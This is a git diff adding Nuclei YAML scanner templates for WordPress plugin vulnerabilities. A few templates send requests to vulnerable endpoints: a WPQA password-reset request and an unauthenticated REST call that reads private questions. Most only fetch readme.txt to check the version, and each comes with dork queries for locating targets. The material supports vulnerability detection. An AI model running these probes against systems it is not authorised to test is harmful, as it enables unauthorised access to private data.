user_mail={{user}}@{{Host}}&form_type=wpqa_forget&action=wpqa_ajax_password_process&redirect_to={{url_encode(redirect_to)}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{redirect_to}}' + - '"success":1' + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 4b0a00483046022100e783a69d637d8a9c688bd4ac063eb781edc4dc5bee41913dea8efc85ad0ace4f022100f5bf69553a1575c161fdb2198ca7005e5d232f990e81ef47b9b1684bfcffd3ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-1598-6654.yaml b/poc/cve/CVE-2022-1598-6654.yaml new file mode 100644 index 0000000000..a01f8dc4ee --- /dev/null +++ b/poc/cve/CVE-2022-1598-6654.yaml @@ -0,0 +1,53 @@ +id: CVE-2022-1598 + +info: + name: WordPress WPQA <5.5 - Improper Access Control + author: veshraj + severity: medium + description: | + WordPress WPQA plugin before 5.5 is susceptible to improper access control. The plugin lacks authentication in a REST API endpoint. An attacker can potentially discover private questions sent between users on the site. + impact: | + This vulnerability can result in unauthorized access to sensitive information, potentially leading to data breaches or unauthorized actions. + remediation: | + Update the WPQA plugin to version 5.5 or later to fix the improper access control issue. + reference: + - https://wpscan.com/vulnerability/0416ae2f-5670-4080-a88d-3484bb19d8c8 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1598 + - https://nvd.nist.gov/vuln/detail/CVE-2022-1598 + - https://github.com/20142995/Goby + - https://github.com/WhooAmii/POC_to_review + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2022-1598 + cwe-id: CWE-306 + epss-score: 0.01171 + epss-percentile: 0.84672 + cpe: cpe:2.3:a:2code:wpqa_builder:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 1 + vendor: 2code + product: wpqa_builder + framework: wordpress + google-query: inurl:/wp-content/plugins/wpqa + tags: cve,cve2022,wordpress,wp-plugin,wpqa,idor,wpscan,2code + +http: + - method: GET + path: + - '{{BaseURL}}/wp-json/wp/v2/asked-question' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"id":' + - '"rendered":' + condition: and + + - type: status + status: + - 200 +# digest: 490a00463044022021b93d9ab57892fc1d94341d94f4826d6854e08a0fa9bce7672de506ae876a77022068edb87c27a2607cd497f6ca61cef522833220ba5ab8d5fba938d004f8ffa662:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2023-24407.yaml b/poc/cve/CVE-2023-24407.yaml new file mode 100644 index 0000000000..895f0f7ca1 --- /dev/null +++ b/poc/cve/CVE-2023-24407.yaml @@ -0,0 +1,59 @@ +id: CVE-2023-24407-725d247a52bd9564ba0263d24a049d49 + +info: + name: > + Booking calendar, Appointment Booking System <= 3.2.3 - Missing Authorization + author: topscoder + severity: low + description: > + The Booking calendar, Appointment Booking System plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 3.2.3. This makes it possible for authenticated attackers, with Editor-level access and above, to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a3a5c4f2-22f6-45df-bf76-9dfa1d2f5f41?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L + cvss-score: 4.1 + cve-id: CVE-2023-24407 + metadata: + fofa-query: "wp-content/plugins/booking-calendar/" + google-query: inurl:"/wp-content/plugins/booking-calendar/" + shodan-query: 'vuln:CVE-2023-24407' + tags: cve,wordpress,wp-plugin,booking-calendar,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/booking-calendar/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "booking-calendar" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.2.3') \ No newline at end of file diff --git a/poc/cve/CVE-2023-49196.yaml b/poc/cve/CVE-2023-49196.yaml new file mode 100644 index 0000000000..cb3853e083 --- /dev/null +++ b/poc/cve/CVE-2023-49196.yaml @@ -0,0 +1,59 @@ +id: CVE-2023-49196-1f41ce4580ff2a6b6234baa60b4e1aca + +info: + name: > + PageLayer <= 1.7.7 - Cross-Site Request Forgery via pagelayer_load_plugin + author: topscoder + severity: medium + description: > + The Page Builder: Pagelayer – Drag and Drop website builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.7.7. This is due to missing or incorrect nonce validation on the pagelayer_load_plugin function. This makes it possible for unauthenticated attackers to disable the "getting started" promo via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3a0c8ecc-f0a1-41fa-a5f7-2d65d610efc0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2023-49196 + metadata: + fofa-query: "wp-content/plugins/pagelayer/" + google-query: inurl:"/wp-content/plugins/pagelayer/" + shodan-query: 'vuln:CVE-2023-49196' + tags: cve,wordpress,wp-plugin,pagelayer,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/pagelayer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "pagelayer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.7.7') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10010.yaml b/poc/cve/CVE-2024-10010.yaml new file mode 100644 index 0000000000..c2ef47f31a --- /dev/null +++ b/poc/cve/CVE-2024-10010.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10010-951aa2e5ac7c686265be838ce5e0fe9f + +info: + name: > + LearnPress <= 4.2.7.1 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 4.2.7.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/68991289-acfa-4ab9-9852-755e5f1eda33?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-10010 + metadata: + fofa-query: "wp-content/plugins/learnpress/" + google-query: inurl:"/wp-content/plugins/learnpress/" + shodan-query: 'vuln:CVE-2024-10010' + tags: cve,wordpress,wp-plugin,learnpress,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/learnpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "learnpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.2.7.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10104.yaml b/poc/cve/CVE-2024-10104.yaml new file mode 100644 index 0000000000..2bc1572dae --- /dev/null +++ b/poc/cve/CVE-2024-10104.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10104-b84d2405dfa0880c1a70b2a3fad82d45 + +info: + name: > + Jobs for WordPress <= 2.7.7 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Jobs for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 2.7.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3bbe6b57-9c50-4515-aa62-a9d9a41bf4ce?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10104 + metadata: + fofa-query: "wp-content/plugins/job-postings/" + google-query: inurl:"/wp-content/plugins/job-postings/" + shodan-query: 'vuln:CVE-2024-10104' + tags: cve,wordpress,wp-plugin,job-postings,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/job-postings/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "job-postings" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.7.7') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10146.yaml b/poc/cve/CVE-2024-10146.yaml new file mode 100644 index 0000000000..ed7ce97858 --- /dev/null +++ b/poc/cve/CVE-2024-10146.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10146-7c5ec1542ecba7c343e02aa01e7c0776 + +info: + name: > + Simple File List <= 6.1.11 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Simple File List plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via a URL in all versions up to, and including, 6.1.12 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/078b58df-ca2f-4c44-896b-f0e0f7d3bf2b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-10146 + metadata: + fofa-query: "wp-content/plugins/simple-file-list/" + google-query: inurl:"/wp-content/plugins/simple-file-list/" + shodan-query: 'vuln:CVE-2024-10146' + tags: cve,wordpress,wp-plugin,simple-file-list,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/simple-file-list/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "simple-file-list" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.1.12') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10471.yaml b/poc/cve/CVE-2024-10471.yaml new file mode 100644 index 0000000000..64646065f4 --- /dev/null +++ b/poc/cve/CVE-2024-10471.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10471-73a898dfd96211fb8e950b5570e3fb68 + +info: + name: > + Everest Forms <= 3.0.4.1 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Everest Forms – Build Contact Forms, Surveys, Polls, Quizzes, Newsletter & Application Forms, and Many More with Ease! plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.0.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7f6f1c16-afd6-4c69-8988-70c6c0105748?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-10471 + metadata: + fofa-query: "wp-content/plugins/everest-forms/" + google-query: inurl:"/wp-content/plugins/everest-forms/" + shodan-query: 'vuln:CVE-2024-10471' + tags: cve,wordpress,wp-plugin,everest-forms,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/everest-forms/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "everest-forms" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.0.4.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10473.yaml b/poc/cve/CVE-2024-10473.yaml new file mode 100644 index 0000000000..8ce616a5d0 --- /dev/null +++ b/poc/cve/CVE-2024-10473.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10473-4bd3b2366c1ef349a8ea2852cdba87bd + +info: + name: > + Logo Slider <= 4.1.0 - Authenticated (Author+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Logo Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 4.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/fa1c526d-b751-4461-9e54-e7704ca8ddc3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10473 + metadata: + fofa-query: "wp-content/plugins/cb-logo-slider/" + google-query: inurl:"/wp-content/plugins/cb-logo-slider/" + shodan-query: 'vuln:CVE-2024-10473' + tags: cve,wordpress,wp-plugin,cb-logo-slider,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cb-logo-slider/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cb-logo-slider" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10480.yaml b/poc/cve/CVE-2024-10480.yaml new file mode 100644 index 0000000000..b888bbbff3 --- /dev/null +++ b/poc/cve/CVE-2024-10480.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10480-c478c5a474eb7197d1a2e40d153a7824 + +info: + name: > + 3DPrint Lite <= 2.0.9.9 - Cross-Site Request Forgery to Settings Update + author: topscoder + severity: medium + description: > + The 3DPrint Lite plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.9.9. This is due to missing or incorrect nonce validation on the 'p3dlite_settings' action. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0c29e242-b05c-4876-8948-1278982d6fbc?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-10480 + metadata: + fofa-query: "wp-content/plugins/3dprint-lite/" + google-query: inurl:"/wp-content/plugins/3dprint-lite/" + shodan-query: 'vuln:CVE-2024-10480' + tags: cve,wordpress,wp-plugin,3dprint-lite,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/3dprint-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "3dprint-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.9.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10493.yaml b/poc/cve/CVE-2024-10493.yaml new file mode 100644 index 0000000000..3d710b17bf --- /dev/null +++ b/poc/cve/CVE-2024-10493.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10493-0ea5d1ba204f4cd4e380f96698fb397e + +info: + name: > + Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid, Carousel and Remote Arrows) <= 5.10.2 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid, Carousel and Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Lightbox' block in all versions up to, and including, 5.10.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5b77982e-15ab-4376-89d3-7a2609b118eb?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10493 + metadata: + fofa-query: "wp-content/plugins/bdthemes-element-pack-lite/" + google-query: inurl:"/wp-content/plugins/bdthemes-element-pack-lite/" + shodan-query: 'vuln:CVE-2024-10493' + tags: cve,wordpress,wp-plugin,bdthemes-element-pack-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bdthemes-element-pack-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bdthemes-element-pack-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.10.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10510.yaml b/poc/cve/CVE-2024-10510.yaml new file mode 100644 index 0000000000..9741b21767 --- /dev/null +++ b/poc/cve/CVE-2024-10510.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10510-78ba2ace6fdbb75ae1b6ae5ea60bf1ea + +info: + name: > + adBuddy+ (AdBlocker Detection) by NetfunkDesign <= 1.1.3 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The adBuddy+ (AdBlocker Detection) by NetfunkDesign plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1fd0a887-db61-4b2d-af52-ec1d9c525663?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-10510 + metadata: + fofa-query: "wp-content/plugins/adbuddy-adblocker-detection/" + google-query: inurl:"/wp-content/plugins/adbuddy-adblocker-detection/" + shodan-query: 'vuln:CVE-2024-10510' + tags: cve,wordpress,wp-plugin,adbuddy-adblocker-detection,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/adbuddy-adblocker-detection/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "adbuddy-adblocker-detection" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10517.yaml b/poc/cve/CVE-2024-10517.yaml new file mode 100644 index 0000000000..4f51067ec2 --- /dev/null +++ b/poc/cve/CVE-2024-10517.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10517-210079a1dc04e7802385a59afa112a94 + +info: + name: > + ProfilePress <= 4.15.14 - Authenticated (Admin+) Stored Cross-Site Scripting via "Labels" + author: topscoder + severity: low + description: > + The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via "Label" settings in all versions up to, and including, 4.15.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/91291608-5aa4-4fa1-b0d8-2b94d3d46f9c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-10517 + metadata: + fofa-query: "wp-content/plugins/wp-user-avatar/" + google-query: inurl:"/wp-content/plugins/wp-user-avatar/" + shodan-query: 'vuln:CVE-2024-10517' + tags: cve,wordpress,wp-plugin,wp-user-avatar,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-user-avatar/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-user-avatar" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.15.14') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10518.yaml b/poc/cve/CVE-2024-10518.yaml new file mode 100644 index 0000000000..0687aca9ff --- /dev/null +++ b/poc/cve/CVE-2024-10518.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10518-8fbb12f5bd52a37d5ae88c83f3c10fed + +info: + name: > + ProfilePress <= 4.15.14 - Authenticated (Admin+) Stored Cross-Site Scripting via "Product Files" + author: topscoder + severity: low + description: > + The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via "Product Files" settings in all versions up to, and including, 4.15.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a6320203-2ee8-4316-96bc-0a8e1dd6b66a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-10518 + metadata: + fofa-query: "wp-content/plugins/wp-user-avatar/" + google-query: inurl:"/wp-content/plugins/wp-user-avatar/" + shodan-query: 'vuln:CVE-2024-10518' + tags: cve,wordpress,wp-plugin,wp-user-avatar,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-user-avatar/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-user-avatar" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.15.14') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10568.yaml b/poc/cve/CVE-2024-10568.yaml new file mode 100644 index 0000000000..8b0c784427 --- /dev/null +++ b/poc/cve/CVE-2024-10568.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10568-9765873fc9eb5df11bad8c11c4bb8f5f + +info: + name: > + Ajax Search Lite <= 4.12.3 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Ajax Search Lite – Live Search & Filter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 4.12.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/10c31c9c-ada9-43b5-a595-ca00b12d6840?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-10568 + metadata: + fofa-query: "wp-content/plugins/ajax-search-lite/" + google-query: inurl:"/wp-content/plugins/ajax-search-lite/" + shodan-query: 'vuln:CVE-2024-10568' + tags: cve,wordpress,wp-plugin,ajax-search-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ajax-search-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ajax-search-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.12.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10646-6a5f696424113cce85ff733ae3bc98b0.yaml b/poc/cve/CVE-2024-10646-6a5f696424113cce85ff733ae3bc98b0.yaml new file mode 100644 index 0000000000..e8017cc08b --- /dev/null +++ b/poc/cve/CVE-2024-10646-6a5f696424113cce85ff733ae3bc98b0.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10646-6a5f696424113cce85ff733ae3bc98b0 + +info: + name: > + Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder <= 5.2.6 - Unauthenticated Stored Cross-Site Scripting via Form Subject + author: topscoder + severity: high + description: > + The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the form's subject parameter in all versions up to, and including, 5.2.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/41c2ec31-360d-4145-b0b4-77d4d1d4b8a1?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cve-id: CVE-2024-10646 + metadata: + fofa-query: "wp-content/plugins/fluentform/" + google-query: inurl:"/wp-content/plugins/fluentform/" + shodan-query: 'vuln:CVE-2024-10646' + tags: cve,wordpress,wp-plugin,fluentform,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/fluentform/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "fluentform" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.2.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10690-9e8bc3f90f0d2a14268c428a04063b03.yaml b/poc/cve/CVE-2024-10690-9e8bc3f90f0d2a14268c428a04063b03.yaml new file mode 100644 index 0000000000..c7b9b8d36a --- /dev/null +++ b/poc/cve/CVE-2024-10690-9e8bc3f90f0d2a14268c428a04063b03.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10690-9e8bc3f90f0d2a14268c428a04063b03 + +info: + name: > + Shortcodes for Elementor <= 1.0.4 - Authenticated (Contributor+) Post Disclosure + author: topscoder + severity: low + description: > + The Shortcodes for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.0.4 via the 'SHORTCODE_ELEMENTOR' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private and draft posts created with Elementor that they should 